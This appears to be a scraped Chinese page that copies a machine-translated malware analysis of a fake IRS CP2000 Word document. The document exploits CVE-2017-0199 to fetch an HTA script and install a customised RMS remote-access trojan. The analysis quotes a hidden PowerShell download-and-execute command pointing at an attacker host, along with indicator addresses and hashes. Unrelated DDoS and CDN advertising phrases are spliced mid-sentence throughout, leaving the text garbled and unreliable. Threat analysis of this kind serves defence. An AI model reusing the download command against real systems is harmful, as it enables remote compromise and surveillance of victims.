来自 网络 2021-04-04 04:14 的文章

ddos处理_最好的_新加坡cdn防攻击

ddos处理_最好的_新加坡cdn防攻击

虽然目前基于宏的文档和脚本构成了大多数恶意垃圾邮件攻击的罪魁祸首,国内高防cdn节点,但我们也看到一些利用嵌入漏洞的文档的活动。例如,我们遇到了一个伪装成CP2000通知的恶意Microsoft Office文件。美国国税局(IRS)通常会在上一次申报表上的信息有误时,将这封信寄给纳税人。上当受骗的受害者将通过自定义远程管理工具感染自己。RAT可用于合法目的,例如由系统管理员使用,但也可以在未经用户同意或不知情的情况下使用RAT来远程控制其计算机、查看和删除文件或部署键盘记录器以静默捕获击键。在这篇博文中,我们将回顾这个漏洞的传递机制,并看看它部署的远程工具。分配恶意文档托管在远程服务器上,用户很可能通过仿冒电子邮件的链接将其打开。该文件包含一个OLE2嵌入链接对象,该对象从远程服务器检索恶意HTA脚本并执行该脚本。反过来,如何开启高防cdn,它下载最终的有效载荷,美国高防cdn节点,云服务器防御ddos,所有这些都需要很少的用户交互,因为它使用的是CVE-2017-0199,第一次发现是在2017年4月作为零日。82.211.30[.]108/css/CP2000国税局文件嵌入的链接指向一个托管在一个意外位置的HTA脚本,udpddos攻击防御CC防御,该脚本是一家挪威公司的受损FTP服务器,它调用PowerShell下载并执行实际的恶意软件有效负载。ftp://lindrupmartinsen[.]编号:21/httpdocs/test/模板.hta"C:\Windows\System32\WindowsPowerShell\v1.0\父进程"-窗口样式隐藏(新对象System.Net.WebClient).DownloadFile('http://82.211.30[.]108/css/intelgfx.exe','C:\Users\[用户名]\AppData\Roaming\62962.exe');有效载荷下载的有效负载(intelgfx.exe)将多个组件提取到本地文件夹中,并使用诱饵快捷方式实现持久性。VBS脚本确保主模块在不显示GUI的情况下运行,以使受害者不可见。RMS-agent代表远程机械手系统,是一家俄罗斯公司开发的远程控制应用程序。看来,在本案中,攻击者拿走了原始程序(如下图所示)并对其进行了轻微定制,更不用说他们将其用于邪恶目的,即监视受害者。它的源代码显示了调试路径信息和它们给模块的名称。办公室剥削和老鼠这不是第一次使用CVE-2017-0199分发RAT。去年8月,TrendMicro描述了一次攻击,在该攻击中,同样的漏洞被改编成PowerPoint,并用于交付REMCOS RAT。它还显示,威胁行为体通常会重新打包现有的工具包(这些工具包可能是合法的),并将其转化为成熟的间谍应用程序。我们向其所有者报告了受损的FTP服务器。Malwarebytes用户已经受到CVE-2017-0199及其有效负载的保护,检测到后门。机器人.感谢@hasherezade对有效负载分析的帮助。妥协指标Word文档CVE-2017-019982.211.30[.]108/css/CP2000国税局文件47EE31F74B6063FAB02811E2BE6B3C2DDAB91D48A98523982E845F9356979C1HTA脚本ftp://lindrupmartinsen[.]编号:21/httpdocs/test/模板.htad01b6d9507429df065b9b823e763a043aa38b722419d35f29a587c893b3008a5主包装(intelgfx.exe)82.211.30[.]108/css/intelgfx.exe924aa03c953201f303e47ddc4825b86abb142edb6c5f82f53205b6c0c61d82c8RAT模块4d0e5ebb4d64adc651608ff4ce335e86631b0d93392fe1e701007ae6187b7186来自同一分发服务器的其他IOC82.211.30[.]108/遗产.xml82.211.30[.]108/css/qbks.exe文件